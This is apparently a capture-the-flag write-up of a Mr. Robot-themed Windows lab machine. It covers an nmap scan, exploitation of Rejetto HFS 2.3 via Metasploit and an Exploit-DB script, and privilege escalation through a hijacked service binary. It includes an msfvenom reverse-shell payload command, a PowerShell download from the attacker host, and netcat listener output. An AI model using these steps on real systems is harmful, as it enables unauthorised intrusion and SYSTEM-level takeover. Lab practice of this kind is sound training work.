Another Mr. Robot themed room (even if this one didn’t have as many references to the TV Show as the other one). This is a Windows machine, recently I wanted to practice some more penetration testing and privilege escalation in a Windows environment as I didn’t have much experience with it.
Table of Contents
Scanning and Enumeration
NMap scan:
Nmap scan report for ip-10-10-179-216.eu-west-1.compute.internal (10.10.179.216) Host is up (0.00035s latency). Not shown: 987 closed ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 3389/tcp open ssl Microsoft SChannel TLS | fingerprint-strings: | TLSSessionReq: | i&Tb | E,!so | steelmountain0 | 230322163145Z | 230921163145Z0 | steelmountain0 | V6oR | [fEdC | \xd0 | CXkq | v;+& | e7t$~Ro | $0"0 | 5J=[ | Al~4 | >$Uwc | \x880v | +pI=[ |_ \xc6_ | ssl-cert: Subject: commonName=steelmountain | Issuer: commonName=steelmountain | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2023-03-22T16:31:45 | Not valid after: 2023-09-21T16:31:45 | MD5: 136b 0349 1fb8 9444 6b88 e679 30bf e5e8 |_SHA-1: 06d8 12f5 b91e f374 a786 664c 97a6 5fc8 c8f5 b9e7 |_ssl-date: 2023-03-23T16:36:18+00:00; -1s from scanner time. 8080/tcp open http HttpFileServer httpd 2.3 |_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1 | http-methods: |_ Supported Methods: GET HEAD POST |_http-server-header: HFS 2.3 |_http-title: HFS / 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49175/tcp open msrpc Microsoft Windows RPC 49176/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : [...] Uptime guess: 0.004 days (since Thu Mar 23 16:30:15 2023) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=264 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:c6:3d:67:d3:69 (unknown) | Names: | STEELMOUNTAIN<00> Flags: <unique><active> | WORKGROUP<00> Flags: <group><active> |_ STEELMOUNTAIN<20> Flags: <unique><active> | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2023-03-23 16:36:19 |_ start_date: 2023-03-23 16:31:03 TRACEROUTE HOP RTT ADDRESS 1 0.35 ms ip-10-10-179-216.eu-west-1.compute.internal (10.10.179.216)
Exploitation
This scan returned some interesting stuff, in particular, I noticed two web servers (ports 80 and 8080). The one on port 8080 was a Rejetto HTTP File Server 2.3, and when looking for information about it I found out there’s a metasploit module for it, exploit/windows/http/rejetto_hfs_exec, which I used to get access to the system:
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit [*] Started reverse TCP handler on 10.10.200.184:4444 [*] Using URL: http://10.10.200.184:8080/4MqDJUUhdmDN4 [*] Server started. [*] Sending a malicious request to / [*] Payload request received: /4MqDJUUhdmDN4 [*] Sending stage (175686 bytes) to 10.10.179.216 [!] Tried to delete %TEMP%\lpjrnIcndES.vbs, unknown result [*] Meterpreter session 1 opened (10.10.200.184:4444 -> 10.10.179.216:49251) at 2023-03-23 16:56:31 +0000 [*] Server stopped. meterpreter > getuid Server username: STEELMOUNTAIN\bill meterpreter > pwd C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup meterpreter >
Privilege escalation
To enumerate this Windows machine, I used a powershell script called PowerUp, useful to evaluate a Windows machine and determine any abnormalities – “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.”
I downloaded the script from this link.
I’ve uploaded the script via Meterpreter, and then opened PowerShell and run the script:
meterpreter > upload PowerUp.ps1
[*] Uploading : /root/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 586.50 KiB of 586.50 KiB (100.0%): /root/PowerUp.ps1 -> PowerUp.ps1
[*] Completed : /root/PowerUp.ps1 -> PowerUp.ps1
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
[...]
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe;
IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
The script found an “Unquoted Service Paths” vulnerability, so it was a matter of taking advantage of that and upload an exploit named “Advanced.exe” and place it in the vulnerable path “C:\Program Files (x86)\IObit\Advanced”.
Another important aspect was the CanRestart option being true, because it allows us to restart a service on the system.
The directory to the application is also write-able.
Therefore, I could replace the legitimate application with a malicious one, restart the service, and thus running my malicious executable.
I started with using msfvenom to generate a reverse shell as a Windows executable:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.200.184 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
I then uploaded the file:
meterpreter > upload Advanced.exe meterpreter > mv Advanced.exe C:\\Program\ Files\ (x86)\\IObit\\Advanced.exe
And now with everything in place, I stopped and started again the vulnerable service (while a listener was set up on my machine, waiting for the connection):
meterpreter > shell
Process 2232 created.
Channel 7 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\bill\Desktop>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Users\bill\Desktop>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2284
FLAGS :
On the listener’s terminal I got the shell:
root@ip-10-10-200-184:~# nc -nvlp 4443 Listening on [0.0.0.0] (family 0, port 4443) Connection from 10.10.179.216 49276 received! Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system
With that I could easily find the required flags.
Alternative solution – No Metasploit
I did this machine also without using Metasploit, this is the procedure I’ve followed.
There was an exploit for the vulnerable Rejetto HTTP File Transfer server, available on Exploit-DB: Rejetto HTTP File Server (HFS) 2.3.x – Remote Command Execution.
This exploit allows us to run a command remotely on the target, so I’ve used it to make the target machine download netcat from my attacking machine, and then to make it connect back to me.
I downloaded the exploit, along with a netcat binary that I needed for the target machine.
I amended script to update the attacker’s IP, the listening port, and the webserver port.
I’ve setup a webserver that the exploit could use to make the target machine get the needed files, and run the exploit with the simple command:
python Exploit.py <Target IP address> <Target Port Number>
I’ve setup a python server to make the files available for download:
root@ip-10-10-200-184:~# python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.179.216 - - [23/Mar/2023 17:34:09] "GET /nc.exe HTTP/1.1" 200 - 10.10.179.216 - - [23/Mar/2023 17:34:09] "GET /nc.exe HTTP/1.1" 200 -
(The above code shows the two connections from the target, as I had to run the exploit twice).
This is when I got the shell on the system:
root@ip-10-10-200-184:~# nc -nvlp 4443
Listening on [0.0.0.0] (family 0, port 4443)
Connection from 10.10.179.216 49300 received!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
03/23/2023 09:56 AM <DIR> .
03/23/2023 09:56 AM <DIR> ..
03/23/2023 09:56 AM <DIR> %TEMP%
02/16/2014 01:58 PM 760,320 hfs.exe
1 File(s) 760,320 bytes
3 Dir(s) 44,151,586,816 bytes free
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>
I’ve then uploaded winPEAS from my machine to the target machine using Powershell:
powershell -c Invoke-WebRequest -Uri "http://10.10.200.184:8000/winPEAS.bat" -OutFile "C:\Users\bill\winpeas.bat"
From here it was pretty much the same process as above: winPEAS alerted me of the unquoted paths, I’ve upload the payload made in msfvenom and I stopped and started the affected process to have the root shell.
